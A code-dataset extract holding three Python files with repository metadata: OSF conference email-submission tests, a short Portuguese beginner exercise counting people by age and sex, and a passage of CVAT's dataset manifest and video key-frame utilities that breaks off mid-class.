794fde5050ffdadb9fbdddde87ba03912918053b
| 27,369
|
py
|
Python
|
tests/test_conferences.py
|
yuanyuan-deng/RDM-osf.io
|
e1c54e97c898d26406d71129db7e4baf82802224
|
[
"Apache-2.0"
] | 1
|
2019-12-23T04:30:20.000Z
|
2019-12-23T04:30:20.000Z
|
tests/test_conferences.py
|
yuanyuan-deng/RDM-osf.io
|
e1c54e97c898d26406d71129db7e4baf82802224
|
[
"Apache-2.0"
] | 17
|
2016-01-27T03:26:00.000Z
|
2019-10-30T13:49:15.000Z
|
tests/test_conferences.py
|
yuanyuan-deng/RDM-osf.io
|
e1c54e97c898d26406d71129db7e4baf82802224
|
[
"Apache-2.0"
] | 1
|
2015-08-28T20:00:52.000Z
|
2015-08-28T20:00:52.000Z
|
# -*- coding: utf-8 -*-
import mock
from nose.tools import * # noqa (PEP8 asserts)
import hmac
import hashlib
from StringIO import StringIO
from django.core.exceptions import ValidationError
from django.db import IntegrityError
import furl
from framework.auth import get_or_create_user
from framework.auth.core import Auth
from osf.models import OSFUser, AbstractNode
from addons.wiki.models import WikiVersion
from osf.exceptions import BlacklistedEmailError
from website import settings
from website.conferences import views
from website.conferences import utils, message
from website.util import api_url_for, web_url_for
from tests.base import OsfTestCase, fake
from osf_tests.factories import ConferenceFactory, ProjectFactory, UserFactory
def assert_absolute(url):
parsed_domain = furl.furl(settings.DOMAIN)
parsed_url = furl.furl(url)
assert_equal(parsed_domain.host, parsed_url.host)
def assert_equal_urls(first, second):
parsed_first = furl.furl(first)
parsed_first.port = None
parsed_second = furl.furl(second)
parsed_second.port = None
assert_equal(parsed_first, parsed_second)
def create_fake_conference_nodes(n, endpoint):
nodes = []
for i in range(n):
node = ProjectFactory(is_public=True)
node.add_tag(endpoint, Auth(node.creator))
node.save()
nodes.append(node)
return nodes
def create_fake_conference_nodes_bad_data(n, bad_n, endpoint):
nodes = []
for i in range(n):
node = ProjectFactory(is_public=True)
node.add_tag(endpoint, Auth(node.creator))
# inject bad data
if i < bad_n:
# Delete only contributor
node.contributor_set.filter(user=node.contributors.first()).delete()
node.save()
nodes.append(node)
return nodes
class TestConferenceUtils(OsfTestCase):
def test_get_or_create_user_exists(self):
user = UserFactory()
fetched, created = get_or_create_user(user.fullname, user.username, is_spam=True)
assert_false(created)
assert_equal(user._id, fetched._id)
assert_false('is_spam' in fetched.system_tags)
def test_get_or_create_user_not_exists(self):
fullname = 'Roger Taylor'
username = 'roger@queen.com'
fetched, created = get_or_create_user(fullname, username, is_spam=False)
fetched.save() # in order to access m2m fields, e.g. tags
assert_true(created)
assert_equal(fetched.fullname, fullname)
assert_equal(fetched.username, username)
assert_false('is_spam' in fetched.system_tags)
def test_get_or_create_user_is_spam(self):
fullname = 'John Deacon'
username = 'deacon@queen.com'
fetched, created = get_or_create_user(fullname, username, is_spam=True)
fetched.save() # in order to access m2m fields, e.g. tags
assert_true(created)
assert_equal(fetched.fullname, fullname)
assert_equal(fetched.username, username)
assert_true('is_spam' in fetched.system_tags)
def test_get_or_create_user_with_blacklisted_domain(self):
fullname = 'Kanye West'
username = 'kanye@mailinator.com'
with assert_raises(BlacklistedEmailError) as e:
get_or_create_user(fullname, username, is_spam=True)
assert_equal(e.exception.message, 'Invalid Email')
class ContextTestCase(OsfTestCase):
MAILGUN_API_KEY = 'mailkimp'
@classmethod
def setUpClass(cls):
super(ContextTestCase, cls).setUpClass()
settings.MAILGUN_API_KEY, cls._MAILGUN_API_KEY = cls.MAILGUN_API_KEY, settings.MAILGUN_API_KEY
@classmethod
def tearDownClass(cls):
super(ContextTestCase, cls).tearDownClass()
settings.MAILGUN_API_KEY = cls._MAILGUN_API_KEY
def make_context(self, method='POST', **kwargs):
data = {
'X-Mailgun-Sscore': 0,
'timestamp': '123',
'token': 'secret',
'signature': hmac.new(
key=settings.MAILGUN_API_KEY,
msg='{}{}'.format('123', 'secret'),
digestmod=hashlib.sha256,
).hexdigest(),
}
data.update(kwargs.pop('data', {}))
data = {
key: value
for key, value in data.items()
if value is not None
}
return self.app.app.test_request_context(method=method, data=data, **kwargs)
class TestProvisionNode(ContextTestCase):
def setUp(self):
super(TestProvisionNode, self).setUp()
self.node = ProjectFactory()
self.user = self.node.creator
self.conference = ConferenceFactory()
self.body = 'dragon on my back'
self.content = 'dragon attack'
self.attachment = StringIO(self.content)
self.recipient = '{0}{1}-poster@osf.io'.format(
'test-' if settings.DEV_MODE else '',
self.conference.endpoint,
)
def make_context(self, **kwargs):
data = {
'attachment-count': '1',
'attachment-1': (self.attachment, 'attachment-1'),
'X-Mailgun-Sscore': 0,
'recipient': self.recipient,
'stripped-text': self.body,
}
data.update(kwargs.pop('data', {}))
return super(TestProvisionNode, self).make_context(data=data, **kwargs)
def test_provision(self):
with self.make_context():
msg = message.ConferenceMessage()
utils.provision_node(self.conference, msg, self.node, self.user)
assert_true(self.node.is_public)
assert_in(self.conference.admins.first(), self.node.contributors)
assert_in('emailed', self.node.system_tags)
assert_in(self.conference.endpoint, self.node.system_tags)
assert_true(self.node.tags.filter(name=self.conference.endpoint).exists())
assert_not_in('spam', self.node.system_tags)
def test_provision_private(self):
self.conference.public_projects = False
self.conference.save()
with self.make_context():
msg = message.ConferenceMessage()
utils.provision_node(self.conference, msg, self.node, self.user)
assert_false(self.node.is_public)
assert_in(self.conference.admins.first(), self.node.contributors)
assert_in('emailed', self.node.system_tags)
assert_not_in('spam', self.node.system_tags)
def test_provision_spam(self):
with self.make_context(data={'X-Mailgun-Sscore': message.SSCORE_MAX_VALUE + 1}):
msg = message.ConferenceMessage()
utils.provision_node(self.conference, msg, self.node, self.user)
assert_false(self.node.is_public)
assert_in(self.conference.admins.first(), self.node.contributors)
assert_in('emailed', self.node.system_tags)
assert_in('spam', self.node.system_tags)
@mock.patch('website.conferences.utils.waterbutler_api_url_for')
@mock.patch('website.conferences.utils.requests.put')
def test_upload(self, mock_put, mock_get_url):
mock_get_url.return_value = 'http://queen.com/'
file_name = 'hammer-to-fall'
self.attachment.filename = file_name
self.attachment.content_type = 'application/json'
utils.upload_attachment(self.user, self.node, self.attachment)
mock_get_url.assert_called_with(
self.node._id,
'osfstorage',
_internal=True,
base_url=self.node.osfstorage_region.waterbutler_url,
cookie=self.user.get_or_create_cookie(),
name=file_name
)
mock_put.assert_called_with(
mock_get_url.return_value,
data=self.content,
)
@mock.patch('website.conferences.utils.waterbutler_api_url_for')
@mock.patch('website.conferences.utils.requests.put')
def test_upload_no_file_name(self, mock_put, mock_get_url):
mock_get_url.return_value = 'http://queen.com/'
self.attachment.filename = ''
self.attachment.content_type = 'application/json'
utils.upload_attachment(self.user, self.node, self.attachment)
mock_get_url.assert_called_with(
self.node._id,
'osfstorage',
_internal=True,
base_url=self.node.osfstorage_region.waterbutler_url,
cookie=self.user.get_or_create_cookie(),
name=settings.MISSING_FILE_NAME,
)
mock_put.assert_called_with(
mock_get_url.return_value,
data=self.content,
)
@mock.patch('website.conferences.utils.upload_attachments')
def test_add_poster_by_email(self, mock_upload_attachments):
conference = ConferenceFactory()
with self.make_context(data={'from': 'bdawk@sb52champs.com', 'subject': 'It\'s PARTY TIME!'}):
msg = message.ConferenceMessage()
views.add_poster_by_email(conference, msg)
user = OSFUser.objects.get(username='bdawk@sb52champs.com')
assert user.email == 'bdawk@sb52champs.com'
assert user.fullname == user._id # user's shouldn't be able to use email as fullname, so we use the guid.
class TestMessage(ContextTestCase):
PUSH_CONTEXT = False
def test_verify_signature_valid(self):
with self.make_context():
msg = message.ConferenceMessage()
msg.verify_signature()
def test_verify_signature_invalid(self):
with self.make_context(data={'signature': 'fake'}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
with assert_raises(message.ConferenceError):
msg.verify_signature()
def test_is_spam_false_missing_headers(self):
ctx = self.make_context(
method='POST',
data={'X-Mailgun-Sscore': message.SSCORE_MAX_VALUE - 1},
)
with ctx:
msg = message.ConferenceMessage()
assert not msg.is_spam
def test_is_spam_false_all_headers(self):
ctx = self.make_context(
method='POST',
data={
'X-Mailgun-Sscore': message.SSCORE_MAX_VALUE - 1,
'X-Mailgun-Dkim-Check-Result': message.DKIM_PASS_VALUES[0],
'X-Mailgun-Spf': message.SPF_PASS_VALUES[0],
},
)
with ctx:
msg = message.ConferenceMessage()
assert not msg.is_spam
def test_is_spam_true_sscore(self):
ctx = self.make_context(
method='POST',
data={'X-Mailgun-Sscore': message.SSCORE_MAX_VALUE + 1},
)
with ctx:
msg = message.ConferenceMessage()
assert msg.is_spam
def test_is_spam_true_dkim(self):
ctx = self.make_context(
method='POST',
data={'X-Mailgun-Dkim-Check-Result': message.DKIM_PASS_VALUES[0][::-1]},
)
with ctx:
msg = message.ConferenceMessage()
assert msg.is_spam
def test_is_spam_true_spf(self):
ctx = self.make_context(
method='POST',
data={'X-Mailgun-Spf': message.SPF_PASS_VALUES[0][::-1]},
)
with ctx:
msg = message.ConferenceMessage()
assert msg.is_spam
def test_subject(self):
ctx = self.make_context(
method='POST',
data={'subject': 'RE: Hip Hopera'},
)
with ctx:
msg = message.ConferenceMessage()
assert_equal(msg.subject, 'Hip Hopera')
def test_recipient(self):
address = 'test-conference@osf.io'
ctx = self.make_context(
method='POST',
data={'recipient': address},
)
with ctx:
msg = message.ConferenceMessage()
assert_equal(msg.recipient, address)
def test_text(self):
text = 'welcome to my nuclear family'
ctx = self.make_context(
method='POST',
data={'stripped-text': text},
)
with ctx:
msg = message.ConferenceMessage()
assert_equal(msg.text, text)
def test_sender_name(self):
names = [
(' Fred', 'Fred'),
(u'Me䬟', u'Me䬟'),
(u'fred@queen.com', u'fred@queen.com'),
(u'Fred <fred@queen.com>', u'Fred'),
(u'"Fred" <fred@queen.com>', u'Fred'),
]
for name in names:
with self.make_context(data={'from': name[0]}):
msg = message.ConferenceMessage()
assert_equal(msg.sender_name, name[1])
def test_sender_email(self):
emails = [
(u'fred@queen.com', u'fred@queen.com'),
(u'FRED@queen.com', u'fred@queen.com')
]
for email in emails:
with self.make_context(data={'from': email[0]}):
msg = message.ConferenceMessage()
assert_equal(msg.sender_email, email[1])
def test_route_invalid_pattern(self):
with self.make_context(data={'recipient': 'spam@osf.io'}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
with assert_raises(message.ConferenceError):
msg.route
def test_route_invalid_test(self):
recipient = '{0}conf-talk@osf.io'.format('' if settings.DEV_MODE else 'stage-')
with self.make_context(data={'recipient': recipient}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
with assert_raises(message.ConferenceError):
msg.route
def test_route_valid_alternate(self):
conf = ConferenceFactory(endpoint='chocolate', active=True)
conf.name = 'Chocolate Conference'
conf.field_names['submission2'] = 'data'
conf.save()
recipient = '{0}chocolate-data@osf.io'.format('test-' if settings.DEV_MODE else '')
with self.make_context(data={'recipient': recipient}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
assert_equal(msg.conference_name, 'chocolate')
assert_equal(msg.conference_category, 'data')
conf.__class__.delete(conf)
def test_route_valid_b(self):
recipient = '{0}conf-poster@osf.io'.format('test-' if settings.DEV_MODE else '')
with self.make_context(data={'recipient': recipient}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
assert_equal(msg.conference_name, 'conf')
assert_equal(msg.conference_category, 'poster')
def test_alternate_route_invalid(self):
recipient = '{0}chocolate-data@osf.io'.format('test-' if settings.DEV_MODE else '')
with self.make_context(data={'recipient': recipient}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
with assert_raises(message.ConferenceError):
msg.route
def test_attachments_count_zero(self):
with self.make_context(data={'attachment-count': '0'}):
msg = message.ConferenceMessage()
assert_equal(msg.attachments, [])
def test_attachments_count_one(self):
content = 'slightly mad'
sio = StringIO(content)
ctx = self.make_context(
method='POST',
data={
'attachment-count': 1,
'attachment-1': (sio, 'attachment-1'),
},
)
with ctx:
msg = message.ConferenceMessage()
assert_equal(len(msg.attachments), 1)
assert_equal(msg.attachments[0].read(), content)
class TestConferenceEmailViews(OsfTestCase):
def test_redirect_to_meetings_url(self):
url = '/presentations/'
res = self.app.get(url)
assert_equal(res.status_code, 302)
res = res.follow()
assert_equal(res.request.path, '/meetings/')
def test_conference_submissions(self):
AbstractNode.objects.all().delete()
conference1 = ConferenceFactory()
conference2 = ConferenceFactory()
# Create conference nodes
create_fake_conference_nodes(
3,
conference1.endpoint,
)
create_fake_conference_nodes(
2,
conference2.endpoint,
)
url = api_url_for('conference_submissions')
res = self.app.get(url)
assert_equal(res.json['success'], True)
def test_conference_plain_returns_200(self):
conference = ConferenceFactory()
url = web_url_for('conference_results__plain', meeting=conference.endpoint)
res = self.app.get(url)
assert_equal(res.status_code, 200)
def test_conference_data(self):
conference = ConferenceFactory()
# Create conference nodes
n_conference_nodes = 3
create_fake_conference_nodes(
n_conference_nodes,
conference.endpoint,
)
# Create a non-conference node
ProjectFactory()
url = api_url_for('conference_data', meeting=conference.endpoint)
res = self.app.get(url)
assert_equal(res.status_code, 200)
assert_equal(len(res.json), n_conference_nodes)
# Regression for OSF-8864 to confirm bad project data does not make whole conference break
def test_conference_bad_data(self):
conference = ConferenceFactory()
# Create conference nodes
n_conference_nodes = 3
n_conference_nodes_bad = 1
create_fake_conference_nodes_bad_data(
n_conference_nodes,
n_conference_nodes_bad,
conference.endpoint,
)
# Create a non-conference node
ProjectFactory()
url = api_url_for('conference_data', meeting=conference.endpoint)
res = self.app.get(url)
assert_equal(res.status_code, 200)
assert_equal(len(res.json), n_conference_nodes - n_conference_nodes_bad)
def test_conference_data_url_upper(self):
conference = ConferenceFactory()
# Create conference nodes
n_conference_nodes = 3
create_fake_conference_nodes(
n_conference_nodes,
conference.endpoint,
)
# Create a non-conference node
ProjectFactory()
url = api_url_for('conference_data', meeting=conference.endpoint.upper())
res = self.app.get(url)
assert_equal(res.status_code, 200)
assert_equal(len(res.json), n_conference_nodes)
def test_conference_data_tag_upper(self):
conference = ConferenceFactory()
# Create conference nodes
n_conference_nodes = 3
create_fake_conference_nodes(
n_conference_nodes,
conference.endpoint.upper(),
)
# Create a non-conference node
ProjectFactory()
url = api_url_for('conference_data', meeting=conference.endpoint)
res = self.app.get(url)
assert_equal(res.status_code, 200)
assert_equal(len(res.json), n_conference_nodes)
def test_conference_results(self):
conference = ConferenceFactory()
url = web_url_for('conference_results', meeting=conference.endpoint)
res = self.app.get(url)
assert_equal(res.status_code, 200)
def test_confererence_results_endpoint_is_case_insensitive(self):
ConferenceFactory(endpoint='StudySwap')
url = web_url_for('conference_results', meeting='studyswap')
res = self.app.get(url)
assert_equal(res.status_code, 200)
class TestConferenceModel(OsfTestCase):
def test_endpoint_is_required(self):
with assert_raises(IntegrityError):
ConferenceFactory(endpoint=None, name=fake.company()).save()
def test_name_is_required(self):
with assert_raises(IntegrityError):
ConferenceFactory(endpoint='spsp2014', name=None).save()
def test_default_field_names(self):
conf = ConferenceFactory(endpoint='cookie', name='Cookies Conference')
conf.save()
assert_equal(conf.field_names['submission1'], 'poster')
assert_equal(conf.field_names['mail_subject'], 'Presentation title')
class TestConferenceIntegration(ContextTestCase):
@mock.patch('website.conferences.views.send_mail')
@mock.patch('website.conferences.utils.upload_attachments')
def test_integration(self, mock_upload, mock_send_mail):
fullname = 'John Deacon'
username = 'deacon@queen.com'
title = 'good songs'
conference = ConferenceFactory()
body = 'dragon on my back'
content = 'dragon attack'
recipient = '{0}{1}-poster@osf.io'.format(
'test-' if settings.DEV_MODE else '',
conference.endpoint,
)
self.app.post(
api_url_for('meeting_hook'),
{
'X-Mailgun-Sscore': 0,
'timestamp': '123',
'token': 'secret',
'signature': hmac.new(
key=settings.MAILGUN_API_KEY,
msg='{}{}'.format('123', 'secret'),
digestmod=hashlib.sha256,
).hexdigest(),
'attachment-count': '1',
'X-Mailgun-Sscore': 0,
'from': '{0} <{1}>'.format(fullname, username),
'recipient': recipient,
'subject': title,
'stripped-text': body,
},
upload_files=[
('attachment-1', 'attachment-1', content),
],
)
assert_true(mock_upload.called)
users = OSFUser.objects.filter(username=username)
assert_equal(users.count(), 1)
nodes = AbstractNode.objects.filter(title=title)
assert_equal(nodes.count(), 1)
node = nodes[0]
assert_equal(WikiVersion.objects.get_for_node(node, 'home').content, body)
assert_true(mock_send_mail.called)
call_args, call_kwargs = mock_send_mail.call_args
assert_absolute(call_kwargs['conf_view_url'])
assert_absolute(call_kwargs['set_password_url'])
assert_absolute(call_kwargs['profile_url'])
assert_absolute(call_kwargs['file_url'])
assert_absolute(call_kwargs['node_url'])
@mock.patch('website.conferences.views.send_mail')
def test_integration_inactive(self, mock_send_mail):
conference = ConferenceFactory(active=False)
fullname = 'John Deacon'
username = 'deacon@queen.com'
title = 'good songs'
body = 'dragon on my back'
recipient = '{0}{1}-poster@osf.io'.format(
'test-' if settings.DEV_MODE else '',
conference.endpoint,
)
res = self.app.post(
api_url_for('meeting_hook'),
{
'X-Mailgun-Sscore': 0,
'timestamp': '123',
'token': 'secret',
'signature': hmac.new(
key=settings.MAILGUN_API_KEY,
msg='{}{}'.format('123', 'secret'),
digestmod=hashlib.sha256,
).hexdigest(),
'attachment-count': '1',
'X-Mailgun-Sscore': 0,
'from': '{0} <{1}>'.format(fullname, username),
'recipient': recipient,
'subject': title,
'stripped-text': body,
},
expect_errors=True,
)
assert_equal(res.status_code, 406)
call_args, call_kwargs = mock_send_mail.call_args
assert_equal(call_args, (username, views.CONFERENCE_INACTIVE))
assert_equal(call_kwargs['fullname'], fullname)
assert_equal_urls(
call_kwargs['presentations_url'],
web_url_for('conference_view', _absolute=True),
)
@mock.patch('website.conferences.views.send_mail')
@mock.patch('website.conferences.utils.upload_attachments')
def test_integration_wo_full_name(self, mock_upload, mock_send_mail):
username = 'no_full_name@mail.com'
title = 'no full name only email'
conference = ConferenceFactory()
body = 'dragon on my back'
content = 'dragon attack'
recipient = '{0}{1}-poster@osf.io'.format(
'test-' if settings.DEV_MODE else '',
conference.endpoint,
)
self.app.post(
api_url_for('meeting_hook'),
{
'X-Mailgun-Sscore': 0,
'timestamp': '123',
'token': 'secret',
'signature': hmac.new(
key=settings.MAILGUN_API_KEY,
msg='{}{}'.format('123', 'secret'),
digestmod=hashlib.sha256,
).hexdigest(),
'attachment-count': '1',
'X-Mailgun-Sscore': 0,
'from': username,
'recipient': recipient,
'subject': title,
'stripped-text': body,
},
upload_files=[
('attachment-1', 'attachment-1', content),
],
)
assert_true(mock_upload.called)
users = OSFUser.objects.filter(username=username)
assert_equal(users.count(), 1)
nodes = AbstractNode.objects.filter(title=title)
assert_equal(nodes.count(), 1)
node = nodes[0]
assert_equal(WikiVersion.objects.get_for_node(node, 'home').content, body)
assert_true(mock_send_mail.called)
call_args, call_kwargs = mock_send_mail.call_args
assert_absolute(call_kwargs['conf_view_url'])
assert_absolute(call_kwargs['set_password_url'])
assert_absolute(call_kwargs['profile_url'])
assert_absolute(call_kwargs['file_url'])
assert_absolute(call_kwargs['node_url'])
@mock.patch('website.conferences.views.send_mail')
@mock.patch('website.conferences.utils.upload_attachments')
def test_create_conference_node_with_same_name_as_existing_node(self, mock_upload, mock_send_mail):
conference = ConferenceFactory()
user = UserFactory()
title = 'Long Live Greg'
ProjectFactory(creator=user, title=title)
body = 'Greg is a good plant'
content = 'Long may they reign.'
recipient = '{0}{1}-poster@osf.io'.format(
'test-' if settings.DEV_MODE else '',
conference.endpoint,
)
self.app.post(
api_url_for('meeting_hook'),
{
'X-Mailgun-Sscore': 0,
'timestamp': '123',
'token': 'secret',
'signature': hmac.new(
key=settings.MAILGUN_API_KEY,
msg='{}{}'.format('123', 'secret'),
digestmod=hashlib.sha256,
).hexdigest(),
'attachment-count': '1',
'X-Mailgun-Sscore': 0,
'from': '{0} <{1}>'.format(user.fullname, user.username),
'recipient': recipient,
'subject': title,
'stripped-text': body,
},
upload_files=[
('attachment-1', 'attachment-1', content),
],
)
assert AbstractNode.objects.filter(title=title, creator=user).count() == 2
assert mock_upload.called
assert mock_send_mail.called
| 36.736913
| 114
| 0.610654
|
794fdf3beaeacf64fdd917baf3bf4576c15628a8
| 851
|
py
|
Python
|
DESAFIO-064.py
|
Lukones/Evolution-Projetos-Python
|
d979f3702f0e22ab5256b19fd957dba587c44f85
|
[
"MIT"
] | null | null | null |
DESAFIO-064.py
|
Lukones/Evolution-Projetos-Python
|
d979f3702f0e22ab5256b19fd957dba587c44f85
|
[
"MIT"
] | null | null | null |
DESAFIO-064.py
|
Lukones/Evolution-Projetos-Python
|
d979f3702f0e22ab5256b19fd957dba587c44f85
|
[
"MIT"
] | null | null | null |
from time import sleep
cont18 = conthomen = contF20 = 0
while True:
idade = int(input('Digite sua idade: '))
sexo = ' '
while sexo not in 'FM':
sexo = str(input('Digite seu sexo [F/M]: ')).strip().upper()[0]
print('='*30)
print('\033[4;31mCADASTRANDO...\033[m')
print('='*30)
sleep(1)
if sexo in 'Ff':
if idade <= 20:
contF20 += 1
if sexo in 'Mm':
conthomen += 1
if idade >= 18:
cont18 += 1
dnv = ' '
while dnv not in 'SsNn':
dnv = str(input('Deseja continuar a cadastrar pessoas? [S/N] ')).strip().upper()[0]
if dnv in 'Nn':
break
print(f'Você cadastrou um total de {cont18} pessoa(s) acima de 18 anos')
print(f'Você cadastrou um total de {conthomen} homens')
print(f'Você cadastrou um total de {contF20} mulheres com menos de 20 anos')
| 30.392857
| 91
| 0.578143
|
794fdf7e6c7d106a5c9fe7a38b91e796b67a67ca
| 18,746
|
py
|
Python
|
utils/dataset_manifest/core.py
|
minguin05/cvat
|
c85bfb86f22e3840dee2f9d60ed4caf229302782
|
[
"Intel",
"MIT"
] | 2
|
2022-03-13T03:45:15.000Z
|
2022-03-13T03:46:19.000Z
|
utils/dataset_manifest/core.py
|
minguin05/cvat
|
c85bfb86f22e3840dee2f9d60ed4caf229302782
|
[
"Intel",
"MIT"
] | null | null | null |
utils/dataset_manifest/core.py
|
minguin05/cvat
|
c85bfb86f22e3840dee2f9d60ed4caf229302782
|
[
"Intel",
"MIT"
] | null | null | null |
# Copyright (C) 2021 Intel Corporation
#
# SPDX-License-Identifier: MIT
import av
import json
import os
from abc import ABC, abstractmethod, abstractproperty
from collections import OrderedDict
from contextlib import closing
from PIL import Image
from .utils import md5_hash, rotate_image
class VideoStreamReader:
def __init__(self, source_path):
self.source_path = source_path
self._key_frames = OrderedDict()
self.frames = 0
with closing(av.open(self.source_path, mode='r')) as container:
self.width, self.height = self._get_frame_size(container)
@staticmethod
def _get_video_stream(container):
video_stream = next(stream for stream in container.streams if stream.type == 'video')
video_stream.thread_type = 'AUTO'
return video_stream
@staticmethod
def _get_frame_size(container):
video_stream = VideoStreamReader._get_video_stream(container)
for packet in container.demux(video_stream):
for frame in packet.decode():
if video_stream.metadata.get('rotate'):
frame = av.VideoFrame().from_ndarray(
rotate_image(
frame.to_ndarray(format='bgr24'),
360 - int(container.streams.video[0].metadata.get('rotate')),
),
format ='bgr24',
)
return frame.width, frame.height
def check_type_first_frame(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
for packet in container.demux(video_stream):
for frame in packet.decode():
if not frame.pict_type.name == 'I':
raise Exception('First frame is not key frame')
return
def check_video_timestamps_sequences(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
frame_pts = -1
frame_dts = -1
for packet in container.demux(video_stream):
for frame in packet.decode():
if None not in {frame.pts, frame_pts} and frame.pts <= frame_pts:
raise Exception('Invalid pts sequences')
if None not in {frame.dts, frame_dts} and frame.dts <= frame_dts:
raise Exception('Invalid dts sequences')
frame_pts, frame_dts = frame.pts, frame.dts
def rough_estimate_frames_ratio(self, upper_bound):
analyzed_frames_number, key_frames_number = 0, 0
_processing_end = False
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
for packet in container.demux(video_stream):
for frame in packet.decode():
if frame.key_frame:
key_frames_number += 1
analyzed_frames_number += 1
if upper_bound == analyzed_frames_number:
_processing_end = True
break
if _processing_end:
break
# In our case no videos with non-key first frame, so 1 key frame is guaranteed
return analyzed_frames_number // key_frames_number
def validate_frames_ratio(self, chunk_size):
upper_bound = 3 * chunk_size
ratio = self.rough_estimate_frames_ratio(upper_bound + 1)
assert ratio < upper_bound, 'Too few keyframes'
def get_size(self):
return self.frames
@property
def frame_sizes(self):
return (self.width, self.height)
def validate_key_frame(self, container, video_stream, key_frame):
for packet in container.demux(video_stream):
for frame in packet.decode():
if md5_hash(frame) != key_frame[1]['md5'] or frame.pts != key_frame[1]['pts']:
self._key_frames.pop(key_frame[0])
return
def validate_seek_key_frames(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
key_frames_copy = self._key_frames.copy()
for key_frame in key_frames_copy.items():
container.seek(offset=key_frame[1]['pts'], stream=video_stream)
self.validate_key_frame(container, video_stream, key_frame)
def save_key_frames(self):
with closing(av.open(self.source_path, mode='r')) as container:
video_stream = self._get_video_stream(container)
frame_number = 0
for packet in container.demux(video_stream):
for frame in packet.decode():
if frame.key_frame:
self._key_frames[frame_number] = {
'pts': frame.pts,
'md5': md5_hash(frame),
}
frame_number += 1
self.frames = frame_number
@property
def key_frames(self):
return self._key_frames
def __len__(self):
return len(self._key_frames)
#TODO: need to change it in future
def __iter__(self):
for idx, key_frame in self._key_frames.items():
yield (idx, key_frame['pts'], key_frame['md5'])
class DatasetImagesReader:
def __init__(self, sources, meta=None, is_sorted=True, use_image_hash=False, *args, **kwargs):
self._sources = sources if is_sorted else sorted(sources)
self._meta = meta
self._content = []
self._data_dir = kwargs.get('data_dir', None)
self._use_image_hash = use_image_hash
def __iter__(self):
for image in self._sources:
img = Image.open(image, mode='r')
img_name = os.path.relpath(image, self._data_dir) if self._data_dir \
else os.path.basename(image)
name, extension = os.path.splitext(img_name)
image_properties = {
'name': name,
'extension': extension,
'width': img.width,
'height': img.height,
}
if self._meta and img_name in self._meta:
image_properties['meta'] = self._meta[img_name]
if self._use_image_hash:
image_properties['checksum'] = md5_hash(img)
yield image_properties
def create(self):
for item in self:
self._content.append(item)
@property
def content(self):
return self._content
class _Manifest:
FILE_NAME = 'manifest.jsonl'
VERSION = '1.1'
def __init__(self, path, upload_dir=None):
assert path, 'A path to manifest file not found'
self._path = os.path.join(path, self.FILE_NAME) if os.path.isdir(path) else path
self._upload_dir = upload_dir
@property
def path(self):
return self._path
@property
def name(self):
return os.path.basename(self._path) if not self._upload_dir \
else os.path.relpath(self._path, self._upload_dir)
# Needed for faster iteration over the manifest file, will be generated to work inside CVAT
# and will not be generated when manually creating a manifest
class _Index:
FILE_NAME = 'index.json'
def __init__(self, path):
assert path and os.path.isdir(path), 'No index directory path'
self._path = os.path.join(path, self.FILE_NAME)
self._index = {}
@property
def path(self):
return self._path
def dump(self):
with open(self._path, 'w') as index_file:
json.dump(self._index, index_file, separators=(',', ':'))
def load(self):
with open(self._path, 'r') as index_file:
self._index = json.load(index_file,
object_hook=lambda d: {int(k): v for k, v in d.items()})
def remove(self):
os.remove(self._path)
def create(self, manifest, skip):
assert os.path.exists(manifest), 'A manifest file not exists, index cannot be created'
with open(manifest, 'r+') as manifest_file:
while skip:
manifest_file.readline()
skip -= 1
image_number = 0
position = manifest_file.tell()
line = manifest_file.readline()
while line:
if line.strip():
self._index[image_number] = position
image_number += 1
position = manifest_file.tell()
line = manifest_file.readline()
def partial_update(self, manifest, number):
assert os.path.exists(manifest), 'A manifest file not exists, index cannot be updated'
with open(manifest, 'r+') as manifest_file:
manifest_file.seek(self._index[number])
line = manifest_file.readline()
while line:
if line.strip():
self._index[number] = manifest_file.tell()
number += 1
line = manifest_file.readline()
def __getitem__(self, number):
assert 0 <= number < len(self), \
'A invalid index number: {}\nMax: {}'.format(number, len(self))
return self._index[number]
def __len__(self):
return len(self._index)
class _ManifestManager(ABC):
BASE_INFORMATION = {
'version' : 1,
'type': 2,
}
def _json_item_is_valid(self, **state):
for item in self._requared_item_attributes:
if state.get(item, None) is None:
raise Exception(f"Invalid '{self.manifest.name} file structure': '{item}' is required, but not found")
def __init__(self, path, upload_dir=None, *args, **kwargs):
self._manifest = _Manifest(path, upload_dir)
self._index = _Index(os.path.dirname(self._manifest.path))
def _parse_line(self, line):
""" Getting a random line from the manifest file """
with open(self._manifest.path, 'r') as manifest_file:
if isinstance(line, str):
assert line in self.BASE_INFORMATION.keys(), \
'An attempt to get non-existent information from the manifest'
for _ in range(self.BASE_INFORMATION[line]):
fline = manifest_file.readline()
return json.loads(fline)[line]
else:
assert self._index, 'No prepared index'
offset = self._index[line]
manifest_file.seek(offset)
properties = manifest_file.readline()
parsed_properties = json.loads(properties)
self._json_item_is_valid(**parsed_properties)
return parsed_properties
def init_index(self):
if os.path.exists(self._index.path):
self._index.load()
else:
self._index.create(self._manifest.path, 3 if self._manifest.TYPE == 'video' else 2)
self._index.dump()
def reset_index(self):
if os.path.exists(self._index.path):
self._index.remove()
def set_index(self):
self.reset_index()
self.init_index()
@abstractmethod
def create(self, content, **kwargs):
pass
@abstractmethod
def partial_update(self, number, properties):
pass
def __iter__(self):
with open(self._manifest.path, 'r') as manifest_file:
manifest_file.seek(self._index[0])
image_number = 0
line = manifest_file.readline()
while line:
if not line.strip():
continue
parsed_properties = json.loads(line)
self._json_item_is_valid(**parsed_properties)
yield (image_number, parsed_properties)
image_number += 1
line = manifest_file.readline()
@property
def manifest(self):
return self._manifest
def __len__(self):
if hasattr(self, '_index'):
return len(self._index)
else:
return None
def __getitem__(self, item):
return self._parse_line(item)
@property
def index(self):
return self._index
@abstractproperty
def data(self):
pass
@abstractmethod
def get_subset(self, subset_names):
pass
class VideoManifestManager(_ManifestManager):
_requared_item_attributes = {'number', 'pts'}
def __init__(self, manifest_path):
super().__init__(manifest_path)
